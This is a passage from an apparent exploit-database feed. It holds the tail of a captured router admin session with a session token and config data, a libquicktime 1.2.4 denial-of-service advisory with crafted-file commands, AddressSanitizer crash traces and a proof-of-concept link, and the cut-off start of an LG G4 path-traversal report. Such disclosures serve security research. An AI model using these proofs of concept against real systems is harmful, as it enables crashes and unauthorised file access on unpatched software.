yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 272,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 701,\r\n \"receive\": 24\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:39.647+03:00\",\r\n \"time\": 1835,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 270,\r\n \"dns\": 251,\r\n \"connect\": 521,\r\n \"send\": 0,\r\n \"wait\": 785,\r\n \"receive\": 8\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n }\r\n ]\r\n }\r\n}\r\n\r\n# You want to follow my activity ?\r\n\r\nhttps://www.linkedin.com/in/ismailtasdelen\r\nhttps://github.com/ismailtasdelen\r\nhttps://packetstormsecurity.com/user/ismailtasdelen\n\n# 0day.today [2018-07-24] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30759"}, {"lastseen": "2018-02-28T01:37:24", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": "2017-06-10T00:00:00", "published": "2017-06-10T00:00:00", "href": "https://0day.today/exploit/description/27921", "id": "1337DAY-ID-27921", "title": "libquicktime 1.2.4 - Denial of Service Vulnerability", "type": "zdt", "sourceData": "libquicktime multiple vulnerabilities\r\n \r\n \r\n================\r\nAuthor : qflb.wu\r\n===============\r\n \r\n \r\nIntroduction:\r\n=============\r\nThe libquicktime package contains the libquicktime library, various plugins and codecs, along with graphical and command line utilities used for encoding and decoding QuickTime files. This is useful for reading and writing files in the QuickTime format. The goal of the project is to enhance, while providing compatibility with the Quicktime 4 Linux library.\r\n \r\n \r\nAffected version:\r\n=====\r\n1.2.4\r\n \r\n \r\nVulnerability Description:\r\n==========================\r\n##################################\r\n1.\r\nthe quicktime_read_moov function in moov.c in libquicktime 1.2.4 can cause a denial of service(infinite loop and CPU consumption) via a crafted mp4 file.\r\n \r\n \r\n./lqtplay libquicktime_1.2.4_quicktime_read_moov_infinite_loop.mp4\r\n \r\n \r\nPOC:\r\nlibquicktime_1.2.4_quicktime_read_moov_infinite_loop.mp4\r\nCVE:\r\nCVE-2017-9122\r\n \r\n \r\n###################################\r\n2.\r\nthe lqt_frame_duration function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(invalid memory read and application crash) via a crafted mp4 file.\r\n \r\n \r\n./lqtplay libquicktime_1.2.4_lqt_frame_duration_invalid_memory_read.mp4\r\n \r\n \r\nASAN:SIGSEGV\r\n=================================================================\r\n==14254==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x7f31e6ae7185 sp 0x7ffed033a270 bp 0x0000006bdb50 T0)\r\n==14254==WARNING: Trying to symbolize code, but external symbolizer is not initialized!\r\n #0 0x7f31e6ae7184 (/usr/local/lib/libquicktime.so.0+0x6c184)\r\n #1 0x49b1c6 (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x49b1c6)\r\n #2 0x47fbaa (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47fbaa)\r\n #3 0x7f31e43b2ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #4 0x47f3dc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n \r\n \r\nAddressSanitizer can not provide additional info.\r\nSUMMARY: AddressSanitizer: SEGV ??:0 ??\r\n==14254==ABORTING\r\n \r\n \r\ndebug info:\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n...\r\nStopped reason: SIGSEGV\r\n0x00007ffff7829185 in lqt_frame_duration (file=<optimized out>, track=<optimized out>, \r\n constant=<optimized out>) at lqt_quicktime.c:1242\r\n1242 return\r\n \r\n \r\nPOC:\r\nlibquicktime_1.2.4_lqt_frame_duration_invalid_memory_read.mp4\r\nCVE:\r\nCVE-2017-9123\r\n \r\n \r\n###################################\r\n3.\r\nthe quicktime_match_32 in util.c in libquicktime 1.2.4 can cause a denial of service(NULL pointer dereference and application crash) via a crafted mp4 file.\r\n \r\n \r\n./lqtplay libquicktime_1.2.4_quicktime_match_32_NULL_pointer_dereference.mp4\r\n \r\n \r\nASAN:SIGSEGV\r\n=================================================================\r\n==14359==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fe8af6b85d8 sp 0x7fff490cd4e0 bp 0x7fff490cd5b0 T0)\r\n==14359==WARNING: Trying to symbolize code, but external symbolizer is not initialized!\r\n #0 0x7fe8af6b85d7 (/usr/local/lib/libquicktime.so.0+0x3605d7)\r\n #1 0x7fe8af68b566 (/usr/local/lib/libquicktime.so.0+0x333566)\r\n #2 0x7fe8af63c71a (/usr/local/lib/libquicktime.so.0+0x2e471a)\r\n #3 0x7fe8af3d1658 (/usr/local/lib/libquicktime.so.0+0x79658)\r\n #4 0x7fe8af3d84a8 (/usr/local/lib/libquicktime.so.0+0x804a8)\r\n #5 0x7fe8af3a95da (/usr/local/lib/libquicktime.so.0+0x515da)\r\n #6 0x47fad2 (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47fad2)\r\n #7 0x7fe8acc8fec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #8 0x47f3dc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n \r\n \r\nAddressSanitizer can not provide additional info.\r\nSUMMARY: AddressSanitizer: SEGV ??:0 ??\r\n==14359==ABORTING\r\n \r\n \r\ndebug info:\r\nProgram received signal SIGSEGV, Segmentation fault.\r\nStopped reason: SIGSEGV\r\n0x00007ffff7b1d5d8 in quicktime_match_32 (_input=<optimized out>, \r\n _output=<optimized out>) at util.c:874\r\n874if(input[0] == output[0] &&\r\n \r\n \r\nPOC:\r\nlibquicktime_1.2.4_quicktime_match_32_NULL_pointer_dereference.mp4\r\nCVE:\r\nCVE-2017-9124\r\n \r\n \r\n###################################\r\n4.\r\nthe lqt_frame_duration function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow) via a crafted mp4 file.\r\n \r\n \r\n./lqtplay libquicktime_1.2.4_lqt_frame_duration_heap-buffer-overflow.mp4\r\n \r\n \r\n=================================================================\r\n==40038==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009cd4 at pc 0x7f28959fc45f bp 0x7ffefd561530 sp 0x7ffefd561528\r\nREAD of size 4 at 0x602000009cd4 thread T0\r\n #0 0x7f28959fc45e in lqt_frame_duration /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1242\r\n #1 0x49b1c6 in quicktime_print_info /home/a/Downloads/libquicktime-1.2.4/utils/common.c:138\r\n #2 0x47fbaa in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:996\r\n #3 0x47fbaa in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852\r\n #4 0x7f28932c7ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #5 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n \r\n \r\n0x602000009cd4 is located 3 bytes to the right of 1-byte region [0x602000009cd0,0x602000009cd1)\r\nallocated by thread T0 here:\r\n #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)\r\n #1 0x7f2895cad7d0 in quicktime_read_stts /home/a/Downloads/libquicktime-1.2.4/src/stts.c:115\r\n \r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1242 lqt_frame_duration\r\nShadow bytes around the buggy address:\r\n 0x0c047fff9340: fa fa 05 fa fa fa 05 fa fa fa 04 fa fa fa 05 fa\r\n 0x0c047fff9350: fa fa 00 fa fa fa 05 fa fa fa 05 fa fa fa 05 fa\r\n 0x0c047fff9360: fa fa 05 fa fa fa 00 fa fa fa 05 fa fa fa 05 fa\r\n 0x0c047fff9370: fa fa 05 fa fa fa 00 fa fa fa 00 00 fa fa 00 01\r\n 0x0c047fff9380: fa fa 04 fa fa fa 05 fa fa fa 00 fa fa fa 05 fa\r\n=>0x0c047fff9390: fa fa 05 fa fa fa 00 fa fa fa[01]fa fa fa 00 04\r\n 0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\n 0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd\r\n 0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==40038==ABORTING\r\n \r\n \r\nPOC:\r\nlibquicktime_1.2.4_lqt_frame_duration_heap-buffer-overflow.mp4\r\nCVE:\r\nCVE-2017-9125\r\n \r\n \r\n###################################\r\n5.\r\nthe quicktime_read_dref_table function in dref.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.\r\n \r\n \r\n./lqtplay libquicktime_1.2.4_quicktime_read_dref_table_heap-buffer-overflow.mp4\r\n \r\n \r\n=================================================================\r\n==41637==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009ce4 at pc 0x7f9cb9ad16e7 bp 0x7ffcf9a1e720 sp 0x7ffcf9a1e718\r\nWRITE of size 1 at 0x602000009ce4 thread T0\r\n #0 0x7f9cb9ad16e6 in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:69\r\n #1 0x7f9cb9ad3bdd in quicktime_read_dref /home/a/Downloads/libquicktime-1.2.4/src/dref.c:147\r\n #2 0x7f9cb9ad0388 in quicktime_read_dinf /home/a/Downloads/libquicktime-1.2.4/src/dinf.c:56\r\n #3 0x7f9cb9afdf09 in quicktime_read_minf /home/a/Downloads/libquicktime-1.2.4/src/minf.c:220\r\n #4 0x7f9cb9afaa9e in quicktime_read_mdia /home/a/Downloads/libquicktime-1.2.4/src/mdia.c:155\r\n #5 0x7f9cb9b4ff1e in quicktime_read_trak /home/a/Downloads/libquicktime-1.2.4/src/trak.c:247\r\n #6 0x7f9cb9b0172a in quicktime_read_moov /home/a/Downloads/libquicktime-1.2.4/src/moov.c:221\r\n #7 0x7f9cb9896658 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1791\r\n #8 0x7f9cb989d4a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026\r\n #9 0x7f9cb986e5da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075\r\n #10 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987\r\n #11 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852\r\n #12 0x7f9cb7154ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #13 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n \r\n \r\n0x602000009ce4 is located 12 bytes to the left of 1-byte region [0x602000009cf0,0x602000009cf1)\r\nallocated by thread T0 here:\r\n #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)\r\n #1 0x7f9cb9ad13ba in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:66\r\n \r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/dref.c:69 quicktime_read_dref_table\r\nShadow bytes around the buggy address:\r\n 0x0c047fff9340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x0c047fff9390: fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa 01 fa\r\n 0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\n 0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd\r\n 0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==41637==ABORTING\r\n \r\n \r\nPOC:\r\nlibquicktime_1.2.4_quicktime_read_dref_table_heap-buffer-overflow.mp4\r\nCVE:\r\nCVE-2017-9126\r\n \r\n \r\n###################################\r\n6.\r\nthe quicktime_user_atoms_read_atom function in useratoms.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.\r\n \r\n \r\n./lqtplay libquicktime_1.2.4_quicktime_user_atoms_read_atom_heap-buffer-overflow.mp4\r\n \r\n \r\n=================================================================\r\n==41642==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009cb1 at pc 0x7f3aa15d47f3 bp 0x7ffc98430d00 sp 0x7ffc98430cf8\r\nWRITE of size 1 at 0x602000009cb1 thread T0\r\n #0 0x7f3aa15d47f2 in quicktime_user_atoms_read_atom /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:84\r\n #1 0x7f3aa1590bd8 in quicktime_read_stsd_video /home/a/Downloads/libquicktime-1.2.4/src/stsdtable.c:557\r\n #2 0x7f3aa1594eb8 in quicktime_read_stsd_table /home/a/Downloads/libquicktime-1.2.4/src/stsdtable.c:694\r\n #3 0x7f3aa158bd4d in quicktime_finalize_stsd /home/a/Downloads/libquicktime-1.2.4/src/stsd.c:336\r\n #4 0x7f3aa1566147 in quicktime_read_minf /home/a/Downloads/libquicktime-1.2.4/src/minf.c:231\r\n #5 0x7f3aa1562a9e in quicktime_read_mdia /home/a/Downloads/libquicktime-1.2.4/src/mdia.c:155\r\n #6 0x7f3aa15b7f1e in quicktime_read_trak /home/a/Downloads/libquicktime-1.2.4/src/trak.c:247\r\n #7 0x7f3aa156972a in quicktime_read_moov /home/a/Downloads/libquicktime-1.2.4/src/moov.c:221\r\n #8 0x7f3aa12fe658 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1791\r\n #9 0x7f3aa13054a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026\r\n #10 0x7f3aa12d65da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075\r\n #11 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987\r\n #12 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852\r\n #13 0x7f3a9ebbcec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #14 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n \r\n \r\n0x602000009cb1 is located 0 bytes to the right of 1-byte region [0x602000009cb0,0x602000009cb1)\r\nallocated by thread T0 here:\r\n #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)\r\n #1 0x7f3aa15d451a in quicktime_user_atoms_read_atom /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:81\r\n \r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:84 quicktime_user_atoms_read_atom\r\nShadow bytes around the buggy address:\r\n 0x0c047fff9340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x0c047fff9390: fa fa fa fa fa fa[01]fa fa fa 00 fa fa fa 00 04\r\n 0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\n 0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd\r\n 0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==41642==ABORTING\r\n \r\n \r\nPOC:\r\nlibquicktime_1.2.4_quicktime_user_atoms_read_atom_heap-buffer-overflow.mp4\r\nCVE:\r\nCVE-2017-9127\r\n \r\n \r\n###################################\r\n7.\r\nthe quicktime_video_width function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.\r\n \r\n \r\n./lqtplay libquicktime_1.2.4_quicktime_video_width_heap-buffer-overflow.mp4\r\n \r\n \r\n=================================================================\r\n==10979==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009d00 at pc 0x7f36a1017a37 bp 0x7ffe65a90010 sp 0x7ffe65a90008\r\nREAD of size 4 at 0x602000009d00 thread T0\r\n #0 0x7f36a1017a36 in quicktime_video_width /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:998\r\n #1 0x7f36a1017a36 in quicktime_init_maps /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1633\r\n #2 0x7f36a101af13 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1891\r\n #3 0x7f36a10204a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026\r\n #4 0x7f36a0ff15da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075\r\n #5 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987\r\n #6 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852\r\n #7 0x7f369e8d7ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #8 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n \r\n \r\n0x602000009d00 is located 4 bytes to the right of 12-byte region [0x602000009cf0,0x602000009cfc)\r\nallocated by thread T0 here:\r\n #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)\r\n #1 0x7f36a12543ba in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:66\r\n \r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:998 quicktime_video_width\r\nShadow bytes around the buggy address:\r\n 0x0c047fff9350: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa\r\n 0x0c047fff9360: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa\r\n 0x0c047fff9370: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd\r\n 0x0c047fff9380: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa\r\n 0x0c047fff9390: fa fa fd fa fa fa fd fa fa fa 01 fa fa fa 00 04\r\n=>0x0c047fff93a0:[fa]fa 00 04 fa fa 00 fa fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\n 0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd\r\n 0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa\r\n 0x0c047fff93f0: fa fa 00 fa fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==10979==ABORTING\r\n \r\n \r\nPOC:\r\nlibquicktime_1.2.4_quicktime_video_width_heap-buffer-overflow.mp4\r\nCVE:\r\nCVE-2017-9128\r\n \r\n \r\n \r\n \r\n=================================\r\n \r\n \r\nqflb.wu () dbappsecurity com cn\r\n \r\n \r\nProofs of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42148.zip\n\n# 0day.today [2018-02-27] #", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/27921"}, {"lastseen": "2018-01-09T03:21:54", "bulletinFamily": "exploit", "description": "Exploit for Android platform in category dos / poc", "modified": "2017-02-14T00:00:00", "published": "2017-02-14T00:00:00", "href": "https://0day.today/exploit/description/27006", "id": "1337DAY-ID-27006", "type": "zdt", "title": "LG G4 - lghashstorageserver Directory Traversal Vulnerability", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=987\r\n \r\nThe lghashstorageserver binder service (/system/bin/lghashstorageserver) \r\nimplementation on the LG G4 is vulnerable to path traversal, allowing an\r\napp to read and write 0x20 bytes from any file in the context of the\r\nlghashstorageserver.\r\n \r\nSee attached for a PoC which reads from /proc/self/attr/current for the \r\nlghashstorageserver.\r\n \r\n[0] opening /dev/binder\r\n[0] looking up service lghashstorage\r\n0000: 00 . 01 . 00 . 00 . 1a . 00 . 00 . 00 . 61 a 00 . 6e n 00 . 64 d 00 . 72 r 00 .\r\n0016: 6f o 00 . 69 i 00 . 64 d 00 . 2e . 00 . 6f o 00 . 73 s 00 . 2e . 00 . 49 I 00 .\r\n0032: 53 S 00 . 65 e 00 . 72 r 00 . 76 v 00 . 69 i 00 . 63 c 00 . 65 e 00 . 4d M 00 .\r\n0048: 61 a 00 . 6e n 00 . 61 a 00 . 